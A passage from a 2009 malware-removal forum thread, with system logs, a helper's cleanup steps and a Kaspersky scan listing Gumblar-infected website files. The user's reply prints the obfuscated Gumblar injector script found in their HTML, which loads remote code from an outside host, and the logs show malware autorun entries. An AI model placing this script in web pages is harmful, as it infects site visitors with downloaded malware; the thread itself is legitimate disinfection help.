"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\H]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL aMRITa.eXE

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9d3c3908-9f8e-11dd-8976-001302e184fe}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL amRiTA.eXE

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b2b2c244-5aae-11de-89f0-001302e184fe}]
shell\AutoRun\command - F:\RECYCLE\D-0-060-0000000000-1111111-2222222\FiX.exe
shell\open\command - F:\RECYCLE\D-0-060-0000000000-1111111-2222222\FiX.exe


======File associations======

.js - edit - "C:\Program Files\Macromedia\Dreamweaver 8\dreamweaver.exe" "%1"

======List of files/folders created in the last 1 months======

2009-08-04 18:33:39 ----D---- C:\Program Files\ERUNT
2009-08-04 18:01:07 ----D---- C:\HostsXpert
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaws.exe
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaw.exe
2009-08-04 00:03:13 ----A---- C:\WINDOWS\system32\java.exe
2009-08-04 00:02:47 ----D---- C:\Program Files\Java
2009-07-31 18:25:21 ----D---- C:\_OTM
2009-07-30 18:43:16 ----D---- C:\Documents and Settings\me\Application Data\Teleca
2009-07-30 18:34:07 ----D---- C:\Documents and Settings\me\Application Data\Sony Ericsson
2009-07-30 18:33:17 ----D---- C:\Program Files\Intuwave
2009-07-30 18:33:07 ----D---- C:\Program Files\Symbian
2009-07-30 18:31:22 ----D---- C:\Program Files\Common Files\Sony Ericsson Shared
2009-07-30 18:31:22 ----D---- C:\Documents and Settings\All Users\Application Data\Sony Ericsson
2009-07-30 18:30:38 ----D---- C:\Program Files\Common Files\Teleca Shared
2009-07-30 18:30:32 ----D---- C:\Program Files\Sony Ericsson
2009-07-30 18:30:32 ----D---- C:\Documents and Settings\All Users\Application Data\Teleca
2009-07-28 23:43:09 ----D---- C:\rsit
2009-07-28 00:24:24 ----A---- C:\startup.txt
2009-07-28 00:23:45 ----D---- C:\Program Files\Trend Micro
2009-07-22 14:21:05 ----SD---- C:\ComboFix
2009-07-21 12:45:53 ----D---- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:40 ----D---- C:\Program Files\SUPERAntiSpyware
2009-07-21 12:45:40 ----D---- C:\Documents and Settings\me\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:15 ----D---- C:\Program Files\Common Files\Wise Installation Wizard
2009-07-21 12:37:36 ----SHD---- C:\RECYCLER
2009-07-21 12:33:14 ----A---- C:\ComboFix.txt
2009-07-20 17:28:56 ----D---- C:\Documents and Settings\me\Application Data\Malwarebytes
2009-07-20 17:28:49 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2009-07-20 17:28:49 ----D---- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2009-07-19 12:27:56 ----RHD---- C:\MSOCache
2009-07-19 11:12:33 ----D---- C:\Program Files\Caricature Studio Green 3.6
2009-07-19 11:11:35 ----D---- C:\Documents and Settings\me\Application Data\Carnival Software
2009-07-16 23:30:50 ----HDC---- C:\WINDOWS\$NtUninstallKB973346$
2009-07-16 23:30:40 ----HDC---- C:\WINDOWS\$NtUninstallKB971633$
2009-07-16 23:27:19 ----HDC---- C:\WINDOWS\$NtUninstallKB961371$
2009-07-10 14:17:03 ----D---- C:\Mp3s
2009-07-06 18:35:03 ----D---- C:\Program Files\iPod
2009-07-06 18:34:50 ----D---- C:\Program Files\iTunes
2009-07-06 18:34:50 ----D---- C:\Documents and Settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-07-06 18:31:32 ----D---- C:\Documents and Settings\All Users\Application Data\Apple Computer
2009-07-06 18:27:03 ----D---- C:\Program Files\Common Files\Apple

======List of files/folders modified in the last 1 months======

2009-08-04 22:47:40 ----D---- C:\WINDOWS\Prefetch
2009-08-04 22:47:32 ----D---- C:\WINDOWS\Temp
2009-08-04 19:25:27 ----D---- C:\WINDOWS\system32\drivers
2009-08-04 19:21:46 ----D---- C:\WINDOWS\network diagnostic
2009-08-04 19:14:14 ----D---- C:\WINDOWS\system32
2009-08-04 19:13:20 ----SD---- C:\WINDOWS\Tasks
2009-08-04 18:34:07 ----D---- C:\WINDOWS\ERDNT
2009-08-04 18:33:39 ----RD---- C:\Program Files
2009-08-04 17:56:53 ----D---- C:\WINDOWS\system32\CatRoot2
2009-08-04 17:50:57 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-08-04 12:42:17 ----SHD---- C:\WINDOWS\Installer
2009-08-04 00:03:20 ----SHD---- C:\Config.Msi
2009-08-04 00:02:52 ----A---- C:\WINDOWS\system32\deploytk.dll
2009-08-03 14:20:33 ----D---- C:\Downloads
2009-08-03 14:18:33 ----D---- C:\Documents and Settings\All Users\Application Data\NOS
2009-08-03 14:18:29 ----D---- C:\Program Files\NOS
2009-08-03 14:18:28 ----SD---- C:\WINDOWS\Downloaded Program Files
2009-08-03 14:17:23 ----D---- C:\Program Files\Unlocker
2009-08-03 14:14:10 ----D---- C:\Program Files\TeamViewer
2009-08-03 13:34:35 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Common Files\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Adobe
2009-08-03 12:08:44 ----D---- C:\Pictures
2009-07-31 21:25:07 ----D---- C:\WINDOWS\WinSxS
2009-07-31 18:34:39 ----D---- C:\WINDOWS
2009-07-30 18:43:30 ----HD---- C:\WINDOWS\inf
2009-07-30 18:33:17 ----HD---- C:\Program Files\InstallShield Installation Information
2009-07-30 18:31:22 ----D---- C:\Program Files\Common Files
2009-07-30 18:30:39 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-07-30 18:28:15 ----D---- C:\WINDOWS\Downloaded Installations
2009-07-28 12:56:42 ----RASH---- C:\boot.ini
2009-07-28 12:56:42 ----A---- C:\WINDOWS\win.ini
2009-07-28 12:56:42 ----A---- C:\WINDOWS\system.ini
2009-07-28 12:51:52 ----A---- C:\WINDOWS\ntbtlog.txt
2009-07-28 00:43:12 ----D---- C:\Harsh
2009-07-24 20:49:30 ----D---- C:\Program Files\Mozilla Firefox
2009-07-24 11:58:36 ----D---- C:\RIIMUN
2009-07-22 18:26:58 ----RSD---- C:\WINDOWS\Fonts
2009-07-22 14:22:13 ----SHD---- C:\System Volume Information
2009-07-22 14:22:13 ----D---- C:\WINDOWS\system32\Restore
2009-07-21 16:14:51 ----D---- C:\WINDOWS\pss
2009-07-21 12:16:32 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2009-07-20 09:09:41 ----D---- C:\WINDOWS\twain_32
2009-07-20 09:04:30 ----D---- C:\Temp
2009-07-20 08:50:42 ----D---- C:\WINDOWS\system32\NtmsData
2009-07-19 12:36:23 ----D---- C:\Program Files\MSBuild
2009-07-19 12:35:35 ----D---- C:\Program Files\Common Files\DESIGNER
2009-07-19 12:35:23 ----D---- C:\WINDOWS\SHELLNEW
2009-07-19 00:35:05 ----D---- C:\Amrita
2009-07-18 23:37:22 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-07-18 23:27:37 ----SD---- C:\Documents and Settings\me\Application Data\Microsoft
2009-07-16 23:44:20 ----D---- C:\Program Files\Oberon Media
2009-07-16 23:38:30 ----D---- C:\Program Files\Bonjour
2009-07-16 23:30:53 ----A---- C:\WINDOWS\imsins.BAK
2009-07-16 23:30:49 ----HD---- C:\WINDOWS\$hf_mig$
2009-07-16 23:30:46 ----RSHD---- C:\WINDOWS\system32\dllcache
2009-07-10 14:03:12 ----D---- C:\Velocity Media
2009-07-07 08:10:58 ----A---- C:\WINDOWS\system32\MRT.exe
2009-07-06 18:37:14 ----D---- C:\Documents and Settings\me\Application Data\Apple Computer
2009-07-06 18:35:44 ----DC---- C:\WINDOWS\system32\DRVSTORE
2009-07-06 18:32:25 ----D---- C:\Program Files\QuickTime

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 eabfiltr;eabfiltr; C:\WINDOWS\system32\DRIVERS\eabfiltr.sys [2005-09-19 7808]
R1 eeCtrl;Symantec Eraser Control driver; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys []
R1 intelppm;Intel Processor Driver; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 36352]
R1 kbdhid;Keyboard HID Driver; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14592]
R1 SASDIFSV;SASDIFSV; \??\C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS []
R1 SASKUTIL;SASKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys []
R1 SPBBCDrv;SPBBCDrv; \??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys []
R1 SRTSP;SRTSP; C:\WINDOWS\System32\Drivers\SRTSP.SYS [2009-03-04 280112]
R1 SRTSPX;SRTSPX; C:\WINDOWS\System32\Drivers\SRTSPX.SYS [2009-03-04 43824]
R1 SYMTDI;SYMTDI; C:\WINDOWS\System32\Drivers\SYMTDI.SYS [2008-08-21 191536]
R1 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\WINDOWS\system32\DRIVERS\wmiacpi.sys [2008-04-14 8832]
R1 WPS;WPS; \??\C:\WINDOWS\system32\drivers\wpsdrvnt.sys []
R1 WS2IFSL;Windows Socket 2.0 Non-IFS Service Provider Support Environment; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2004-08-05 12032]
R2 adfs;adfs; C:\WINDOWS\system32\drivers\adfs.sys [2008-08-14 74720]
R2 mdmxsdk;mdmxsdk; C:\WINDOWS\system32\DRIVERS\mdmxsdk.sys [2006-02-15 12672]
R3 Arp1394;1394 ARP Client Protocol; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-14 60800]
R3 BTKRNL;Bluetooth Bus Enumerator; C:\WINDOWS\system32\DRIVERS\btkrnl.sys [2006-05-12 1342602]
R3 BTWUSB;WIDCOMM USB Bluetooth Driver; C:\WINDOWS\System32\Drivers\btwusb.sys [2006-05-12 57320]
R3 CmBatt;Microsoft ACPI Control Method Battery Driver; C:\WINDOWS\system32\DRIVERS\CmBatt.sys [2008-04-14 13952]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys []
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\WINDOWS\system32\DRIVERS\GEARAspiWDM.sys [2009-03-19 23400]
R3 HBtnKey;HBtnKey; C:\WINDOWS\system32\DRIVERS\cpqbttn.sys [2005-09-19 9344]
R3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\CHDAud.sys [2006-06-02 572928]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 HidUsb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-14 10368]
R3 HSF_DPV;HSF_DPV; C:\WINDOWS\system32\DRIVERS\HSF_DPV.sys [2006-04-20 995712]
R3 HSFHWAZL;HSFHWAZL; C:\WINDOWS\system32\DRIVERS\HSFHWAZL.sys [2006-04-20 208000]
R3 ialm;ialm; C:\WINDOWS\system32\DRIVERS\ialmnt5.sys [2006-03-23 1166972]
R3 mouhid;Mouse HID Driver; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2001-08-17 12160]
R3 NAVENG;NAVENG; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.003\NAVENG.SYS []
R3 NAVEX15;NAVEX15; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.003\NAVEX15.SYS []
R3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-14 61824]
R3 rimmptsk;rimmptsk; C:\WINDOWS\system32\DRIVERS\rimmptsk.sys [2005-11-17 28928]
R3 rimsptsk;rimsptsk; C:\WINDOWS\system32\DRIVERS\rimsptsk.sys [2005-12-22 51840]
R3 rismxdp;Ricoh xD-Picture Card Driver; C:\WINDOWS\system32\DRIVERS\rixdptsk.sys [2005-11-01 308992]
R3 sdbus;sdbus; C:\WINDOWS\system32\DRIVERS\sdbus.sys [2008-04-14 79232]
R3 SymEvent;SymEvent; \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS []
R3 SYMREDRV;SYMREDRV; C:\WINDOWS\System32\Drivers\SYMREDRV.SYS [2008-08-21 27696]
R3 SynTP;Synaptics TouchPad Driver; C:\WINDOWS\system32\DRIVERS\SynTP.sys [2006-06-17 193120]
R3 Teefer2;Teefer2 Miniport; C:\WINDOWS\system32\DRIVERS\teefer2.sys [2008-10-14 49536]
R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-14 30208]
R3 usbhub;USB2 Enabled Hub; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-14 59520]
R3 usbuhci;Microsoft USB Universal Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-14 20608]
R3 w39n51;Intel(R) PRO/Wireless 3945ABG Adapter Driver; C:\WINDOWS\system32\DRIVERS\w39n51.sys [2006-04-21 1429632]
R3 winachsf;winachsf; C:\WINDOWS\system32\DRIVERS\HSF_CNXT.sys [2006-04-20 727296]
R3 WpsHelper;WpsHelper; \??\C:\WINDOWS\system32\drivers\WpsHelper.sys []
R3 zebrceb;Sony Ericsson Cable Emulation Bus (WDM); C:\WINDOWS\system32\DRIVERS\zebrceb.sys [2007-04-13 62984]
S3 catchme;catchme; \??\C:\DOCUME~1\me\LOCALS~1\Temp\catchme.sys []
S3 COH_Mon;COH_Mon; \??\C:\WINDOWS\system32\Drivers\COH_Mon.sys []
S3 E100B;Intel(R) PRO Network Connection Driver; C:\WINDOWS\system32\DRIVERS\e100b325.sys [2006-04-11 163328]
S3 eabusb;eabusb; C:\WINDOWS\system32\DRIVERS\eabusb.sys [2005-09-19 5760]
S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-04-11 51024]
S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-04-11 16080]
S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-04-11 21456]
S3 Profos;Profos; C:\WINDOWS\system32\drivers\Profos.sys []
S3 rtl8139;Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver; C:\WINDOWS\system32\DRIVERS\RTL8139.SYS [2004-08-04 20992]
S3 SASENUM;SASENUM; \??\C:\Program Files\SUPERAntiSpyware\SASENUM.SYS []
S3 sffdisk;SFF Storage Class Driver; C:\WINDOWS\system32\DRIVERS\sffdisk.sys [2008-04-14 11904]
S3 sffp_sd;SFF Storage Protocol Driver for SDBus; C:\WINDOWS\system32\DRIVERS\sffp_sd.sys [2008-04-14 11008]
S3 SRTSPL;SRTSPL; C:\WINDOWS\System32\Drivers\SRTSPL.SYS [2009-03-04 319920]
S3 Trufos;Trufos; C:\WINDOWS\system32\drivers\Trufos.sys []
S3 UIUSys;Conexant Setup API; C:\WINDOWS\system32\DRIVERS\UIUSYS.SYS []
S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-14 32128]
S3 usbprint;Microsoft USB PRINTER Class; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-14 25856]
S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-14 15104]
S3 USBSTOR;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-14 26368]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 zebrbus;Sony Ericsson Composite Device driver; C:\WINDOWS\system32\DRIVERS\zebrbus.sys [2007-04-13 83080]
S3 zebrmdfl;Sony Ericsson Modem Filter; C:\WINDOWS\system32\DRIVERS\zebrmdfl.sys [2007-04-13 15112]
S3 zebrmdm;Sony Ericsson Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdm.sys [2007-04-13 108296]
S3 zebrmdmc;Sony Ericsson mRouter Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdmc.sys [2007-04-13 108424]
S3 zebrsce;Sony Ericsson PC-Connect Port; C:\WINDOWS\system32\DRIVERS\zebrsce.sys [2007-04-13 90888]
S4 agp440;Intel AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agp440.sys [2008-04-14 42368]
S4 agpCPQ;Compaq AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agpCPQ.sys [2008-04-14 44928]
S4 alim1541;ALI AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\alim1541.sys [2008-04-14 42752]
S4 amdagp;AMD AGP Bus Filter Driver; C:\WINDOWS\system32\DRIVERS\amdagp.sys [2008-04-14 43008]
S4 cbidf;cbidf; C:\WINDOWS\system32\DRIVERS\cbidf2k.sys [2001-08-18 13952]
S4 sisagp;SIS AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\sisagp.sys [2008-04-14 40960]
S4 SysPlant;SysPlant for NT; C:\WINDOWS\SYSTEM32\Drivers\SysPlant.sys [2009-05-12 91976]
S4 viaagp;VIA AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\viaagp.sys [2008-04-14 42240]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 btwdins;Bluetooth Service; C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe [2006-05-12 258103]
R2 ccEvtMgr;Symantec Event Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 ccSetMgr;Symantec Settings Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-08-04 152984]
R2 SmcService;Symantec Management Client; C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe [2009-05-12 1803592]
R2 Symantec AntiVirus;Symantec Endpoint Protection; C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe [2009-05-12 2440632]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-07-27 72704]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
S3 LiveUpdate;LiveUpdate; C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE [2009-03-20 3093880]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 AddFiltr;AddFiltr; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\AddFiltr.exe [2006-06-12 126976]
S4 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [2009-06-05 144712]
S4 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-06-11 655624]
S4 gusvc;Google Software Updater; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-06-05 182768]
S4 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
S4 IDriverT;InstallDriver Table Manager; c:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S4 iPod Service;iPod Service; C:\Program Files\iPod\bin\iPodService.exe [2009-06-05 541992]
S4 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2006-05-18 49152]
S4 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe [2006-10-27 65824]
S4 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2006-10-26 441136]
S4 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S4 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-04-11 65795]
S4 RichVideo;Cyberlink RichVideo Service(CRVS); C:\Program Files\CyberLink\Shared Files\RichVideo.exe [2005-08-08 167936]
S4 SNAC;Symantec Network Access Control; C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE [2009-02-01 320840]
S4 WMPNetworkSvc;Windows Media Player Network Sharing Service; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-10-18 913408]

-----------------EOF-----------------
hn2009
Active Member
 
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 4th, 2009, 2:01 pm

Hi :)

My browser seems to work fine as of now.. however since the problem is intermittent I will keep an eye out for the same problem again and will let you know. Thanks again for your valuable time and effort.
OK thats fine and your are welcome!

Backup the Registry:

Modifying the Registry can create unforeseen problems, so it always wise to create a backup before doing so.

Please navigate to Start >> All Programs >>ERUNT >>ERUNT

  • Click on OK within the pop-up menu.
  • In the next menu under C:\WINDOWS\ERDNT\DD-MM-YYYY under Backup options make sure both the following are selected:
  • System registry
  • Current user registry
  • Next click on OK
  • When the Question pop-up appears click on Yes
  • After a short duration the Registry backup is complete! popup will appear
  • Now click on OK. A backup has been created.

Note: If you have uninstalled ERUNT since last used, please inform myself before proceeding any further.

Next:

  • Double-click OTM to start the program.
  • Copy the lines from the codebox to the clipboard by highlighting ALL of them and pressing CTRL + B (or, after highlighting, right-click and choose Copy):
Code: Select all
:Reg
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\H]
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9d3c3908-9f8e-11dd-8976-001302e184fe}]
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b2b2c244-5aae-11de-89f0-001302e184fe}]

:Commands
[EmptyTemp]
[Reboot]
  • Return to OTM, right-click in the "Paste instructions for items to be moved" window (under the yellow bar) and choose Paste
  • Then click the red MoveIt! button.
  • Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of it and pressing CTRL + C (or, after highlighting, right-click and choose Copy), and paste it into your next response.
  • If OTM asks to reboot your computer, allow it to do so. The report should appear in Notepad after the reboot.
  • Close OTM.

Flash Disinfector:

Use this on any USB/Flash drives you may have and or USB external Hard-Drives.

  • Please download Flash_Disinfector and save it to your desktop.
  • Double click to run it.
  • You will be prompted to plug in your flash drive. Plug it in.
  • Flash_Disinfector will start disinfecting your flash and hard drives. This takes a few seconds. Your desktop will disappear in the meantime.
  • When done, a message box will appear. Click OK. Your desktop should now appear. If it doesn't, press Ctrl + Shift + Esc to open Task Manager.
  • Click on File > New Task (Run...). Type in explorer.exe and press Enter. Your desktop should now appear.

When completed the above, please post back the following in the order asked for:

  • How is you computer performing now, any further symptoms and or problems encountered?
  • OTM Log.
  • A new RSIT Log.
User avatar
Dakeyras
MRU Honors Graduate
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 6th, 2009, 10:59 am

Hi,

The computer is working better I think. I've not had problems so far. Though what I did was to connect my USB Hard Drive and have that scanned using the Kaspersky Online Scanner. So I'm also posting the results for that; although I do have a question regarding it: OTM has moved the infected files as follows - "C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1" however I need to use these html files and would like to know how to get rid of the Trojan.

I've tried something and would like to know if I'm right... I noticed the following code right before the body tag and deleted it. Did I do the right thing? Will it completely erradicate the problem? Please advise. Thanks.

Code: Select all
<script language=javascript><!-- 
(function(){var dTccx=('@76ar@20a@3d@22Scrip@74E@6egine@22@2cb@3d@22Vers@69on(@29+@22@2c@6a@3d@22@22@2cu@3d@6e@61v@69g@61@74or@2e@75serAgent@3bif(@28u@2eindexO@66@28@22Chr@6fm@65@22@29@3c0)@26@26(u@2eindexOf(@22Win@22)@3e@30@29@26@26(u@2ein@64ex@4f@66@28@22NT@206@22)@3c0)@26@26(doc@75men@74@2e@63ookie@2e@69ndexOf(@22miek@3d1@22)@3c@30)@26@26(typ@65o@66@28z@72vz@74s)@21@3dty@70eof@28@22A@22)))@7bzrvzt@73@3d@22A@22@3be@76@61l(@22i@66(wi@6edo@77@2e@22+@61+@22)j@3dj+@22+a+@22M@61jor@22+@62+a+@22Mi@6e@6fr@22+@62@2ba+@22@42uild@22@2bb+@22@6a@3b@22@29@3bdo@63@75m@65nt@2ewr@69te(@22@3cs@63@72i@70@74@20sr@63@3d@2f@2fmar@22+@22tuz@2e@63@6e@2f@76id@2f@3fid@3d@22+@6a@2b@22@3e@3c@5c@2f@73cript@3e@22)@3b@7d').replace(/@/g,'%');var Gs8B=unescape(dTccx);eval(Gs8B)})();
 --></script>


Kaspersky Log

--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7.0 REPORT
Thursday, August 6, 2009
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Program database last update: Wednesday, August 05, 2009 06:27:04
Records in database: 2581856
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - My Computer:
C:\
D:\
E:\
H:\

Scan statistics:
Files scanned: 300625
Threat name: 6
Infected objects: 67
Suspicious objects: 0
Duration of the scan: 12:46:29


File name / Threat name / Threats count
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe Infected: Trojan-Downloader.Win32.AutoIt.is 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\bottom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\contact.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\corpevents.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\creative.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\events.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\gallery2.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\marcom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\marketing.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\menu.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\menu.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_dom.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_ie.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_iemac.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_opera.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_safari.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\portfolio.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pr.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\services.html Infected: Trojan-Downloader.JS.Gumblar.a 1
